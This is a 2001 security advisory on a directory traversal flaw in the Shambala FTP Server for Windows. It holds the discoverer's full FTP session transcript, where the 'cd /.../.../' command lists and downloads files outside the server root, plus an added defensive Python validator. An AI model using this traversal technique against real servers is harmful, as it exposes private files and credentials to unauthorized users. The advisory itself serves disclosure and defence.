SecurityTracker.com

SecurityTracker
Archives







Category:  Application (File Transfer)  >  Shambala Server
Vendors:  Evolvable Corporation
Shambala FTP Server Gives Remote Users Access to Any Files on the FTP Server's Drive
Date:  Jun 7 2001 18:28 (UTC/GMT)
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Description:  A vulnerability has been reported in the Shambala FTP server that allows remote users to access files on the server located outside of the server's root directory.

A remote user can change to any directory and view files.

If a remote user sends the command "CWD ..." (or "cd ..." in the default FTP client), the server changes to the parent directory instead of refusing the request.

A transcript of a demonstration exploit scenario is provided in the Source Message.

Impact:  A remote user can traverse the directory tree on the target FTP server and obtain files on the server that are located outside of the FTP server's root document directory.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.evolvable.com/
Cause:  Access control error, Input validation error
Underlying OS:  Windows (NT), Windows (95), Windows (98), Windows (2000)
Reported By:  alt3kx! <alt3kx@raza-mexicana.org>
Message History:   None.
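
An added example, not code from the advisory or from the vendor: one way a server could validate a CWD argument so that dot-only components such as "..." are refused and the result stays under the FTP root. The names FTP_ROOT, resolve_cwd and to_real_path and the sample root path are assumptions; ntpath is used so Windows path rules apply on any host.

```python
import ntpath

# Assumed names and sample root (not from the advisory or the vendor).
FTP_ROOT = r"C:\ftproot"

def resolve_cwd(current: str, arg: str) -> str:
    """Return the new virtual directory for 'CWD arg'; raise PermissionError if refused."""
    if any(ch in arg for ch in "\\:\x00"):
        raise PermissionError("illegal character in path")
    # Absolute arguments restart at the virtual root, relative ones at the current dir.
    parts = [] if arg.startswith("/") else [p for p in current.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PermissionError("above FTP root")
            parts.pop()
            continue
        # Win32 strips trailing dots and spaces, so "Web." aliases "Web" and a
        # dot-only name such as "..." (the advisory's input) names no real directory.
        if comp != comp.rstrip(". "):
            raise PermissionError("dot-only or dot-trailing component")
        parts.append(comp)
    return "/" + "/".join(parts)

def to_real_path(virtual: str, root: str = FTP_ROOT) -> str:
    """Map a validated virtual path to a Windows path and re-check containment."""
    real = ntpath.normpath(ntpath.join(root, *virtual.strip("/").split("/")))
    root_n = ntpath.normcase(ntpath.normpath(root))
    if ntpath.commonpath([root_n, ntpath.normcase(real)]) != root_n:
        raise PermissionError("resolved outside FTP root")
    return real

if __name__ == "__main__":
    # Constructed CWD arguments, including the forms shown in the transcript.
    for arg in ["Web", "..", "../", "/.../.../", "Web/../..", "Web./"]:
        try:
            print(f"CWD {arg!r:14} -> {to_real_path(resolve_cwd('/', arg))}")
        except PermissionError as exc:
            print(f"CWD {arg!r:14} -> refused: {exc}")
```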


 Source Message Contents

Date:  Thu, 07 Jun 2001 14:04:57 -0400
From:  alt3kx! <alt3kx@raza-mexicana.org>
Subject:  Shambala FTP server Directory Traversal

 



======================================================================


	        Shambala FTP server Directory Traversal


Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x, you don't rule, dude!
======================================================================
------------------------=[Brief Description]=-------------------------

Shambala FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory and see the files in that path,
and also GET files remotely.

----------------------------=[Platforms]=-----------------------------

Windows 9.x
Windows NT
Windows 2000


-----------------------------=[Summary]=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



Exploit:

alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  d---------    owner    group          0   21-maj-01 17:50   1.xx.xx.xx
  ----------    owner    group        283   21-maj-01 17:55   index-_-1_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-2_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-3_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-4_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-5_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-6_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-7_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-8_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-9_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-10_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-11_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-12_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-13_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-14_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-15_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-16_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_0_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_0_0_-1.htm
  ----------    owner    group        283   21-maj-01 17:55   .htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-2.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-3.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-4.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-5.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-6.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-7.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-8.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-9.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-10.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-12.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_-1_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_1_0_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_-1_0_-11.htm

226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>

EXPLOIT... ...

ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  ----------    owner    group      15444   04-maj-01 14:26   SCAN.log
  ----------    owner    group     140340   04-maj-01 14:05   MAILS-PRESIDENCIA.txt
  ----------    owner    group     466944   18-sep-99 09:32   Shambala.exe
  ----------    owner    group       3564   21-maj-01 17:48   ST6UNST.LOG
  ----------    owner    group         31   21-maj-01 17:50   passwordsxxx.txt
  d---------    owner    group          0   21-maj-01 17:50   Web
226 Transfer complete.
ftp>


ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  ----------    owner    group     246928   18-jan-01 13:10   N6Setup.exe
  d---------    owner    group          0   18-jan-01 15:39   Netscape 6
  d---------    owner    group          0   18-jan-01 14:50   Netscape 6 Setup
  ----------    owner    group    3209110   19-jan-01 10:51   getrgt.exe

  ----------    owner    group        168   21-maj-01 19:07   raza-alt3kx.txt

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.


alt3kx@machine:/tmp$ cat raza-alt3kx.txt


Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>


alt3kx@machine:/tmp$



-------------------------------=[Patch]=------------------------------

The recommended action is to change the permissions or define an
individual directory for anonymous users, with files that are not compromising.


-------------------------=[Company Compromise]=-----------------------

http://www.evolvable.com








Copyright 2001, SecurityGlobal.net LLC